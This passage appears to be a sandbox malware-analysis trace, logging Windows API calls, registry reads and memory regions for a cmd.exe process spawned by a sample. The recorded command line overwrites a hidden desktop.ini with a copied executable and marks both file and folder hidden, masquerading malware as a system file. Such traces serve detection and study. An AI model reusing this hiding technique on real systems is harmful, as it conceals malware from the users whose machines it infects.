(_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] GetFileType (hFile=0x4c) returned 0x1 [0147.435] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.435] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x32, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] GetFileType (hFile=0x4c) returned 0x1 [0147.436] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.436] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x32, lpOverlapped=0x0) returned 1 [0147.436] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.436] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.436] _close (_FileHandle=4) returned 0 [0147.436] FindNextFileW (in: hFindFile=0x330ec0, lpFindFileData=0x14f31c | out: lpFindFileData=0x14f31c) returned 0 [0147.437] GetLastError () returned 0x12 [0147.437] FindClose (in: hFindFile=0x330ec0 | out: hFindFile=0x330ec0) returned 1 [0147.437] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0147.438] _close (_FileHandle=3) returned 0 [0147.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.438] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.438] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.439] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.439] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.439] SetConsoleInputExeNameW () returned 0x1 [0147.439] GetConsoleOutputCP () returned 0x1b5 [0147.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.439] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.439] exit (_Code=0) Process: id = "214" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18277 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18278 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18279 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18280 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 18281 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18282 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18283 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18284 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18285 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18286 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18311 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18312 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18313 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18314 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 18315 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 18316 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18317 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18318 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18319 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18320 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18321 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18322 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18323 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18324 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18325 start_va = 0x440000 end_va = 0x507fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 18326 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18327 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18328 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 18329 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 18330 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18331 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 18332 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 18333 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 18334 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 18340 start_va = 0x1390000 end_va = 0x165efff entry_point = 0x1390000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 272 os_tid = 0xa5c [0147.384] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f7cc | out: lpSystemTimeAsFileTime=0x22f7cc*(dwLowDateTime=0x91c8f540, dwHighDateTime=0x1d440a9)) [0147.384] GetCurrentProcessId () returned 0xb74 [0147.384] GetCurrentThreadId () returned 0xa5c [0147.384] GetTickCount () returned 0x2dca8 [0147.384] QueryPerformanceCounter (in: lpPerformanceCount=0x22f7c4 | out: lpPerformanceCount=0x22f7c4*=20417313314) returned 1 [0147.385] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.385] __set_app_type (_Type=0x1) [0147.385] __p__fmode () returned 0x76b331f4 [0147.385] __p__commode () returned 0x76b331fc [0147.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.385] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.385] GetCurrentThreadId () returned 0xa5c [0147.385] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa5c) returned 0x38 [0147.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.385] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.385] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.385] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.385] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f75c | out: phkResult=0x22f75c*=0x0) returned 0x2 [0147.385] VirtualQuery (in: lpAddress=0x22f793, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.385] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.386] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f72c, dwLength=0x1c | out: lpBuffer=0x22f72c*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0147.386] GetConsoleOutputCP () returned 0x1b5 [0147.386] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.386] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.386] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.386] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.386] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.386] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.387] GetEnvironmentStringsW () returned 0x2a0598* [0147.387] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.387] GetEnvironmentStringsW () returned 0x2a0598* [0147.387] FreeEnvironmentStringsW (penv=0x2a0598) returned 1 [0147.387] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6cc | out: phkResult=0x22e6cc*=0x40) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x48, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x0, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegCloseKey (hKey=0x40) returned 0x0 [0147.387] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e6cc | out: phkResult=0x22e6cc*=0x40) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x40, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x1, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x0, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.387] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x4, lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x4) returned 0x0 [0147.388] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e6d4, lpData=0x22e6d8, lpcbData=0x22e6d0*=0x1000 | out: lpType=0x22e6d4*=0x0, lpData=0x22e6d8*=0x9, lpcbData=0x22e6d0*=0x1000) returned 0x2 [0147.388] RegCloseKey (hKey=0x40) returned 0x0 [0147.388] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886376 [0147.388] srand (_Seed=0x5b886376) [0147.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" [0147.388] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"" [0147.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.388] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a1cf8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0147.388] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.388] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.388] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.388] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.388] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.388] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.388] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.389] GetEnvironmentStringsW () returned 0x2a26e8* [0147.389] FreeEnvironmentStringsW (penv=0x2a26e8) returned 1 [0147.389] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.389] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.389] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.389] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.389] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.389] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.389] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.389] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.389] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f498 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0147.389] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f498, lpFilePart=0x22f494 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f494*="Desktop") returned 0x18 [0147.389] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0147.389] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.389] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.389] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.390] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.390] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f214 | out: lpFindFileData=0x22f214) returned 0x2a0d78 [0147.390] FindClose (in: hFindFile=0x2a0d78 | out: hFindFile=0x2a0d78) returned 1 [0147.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) 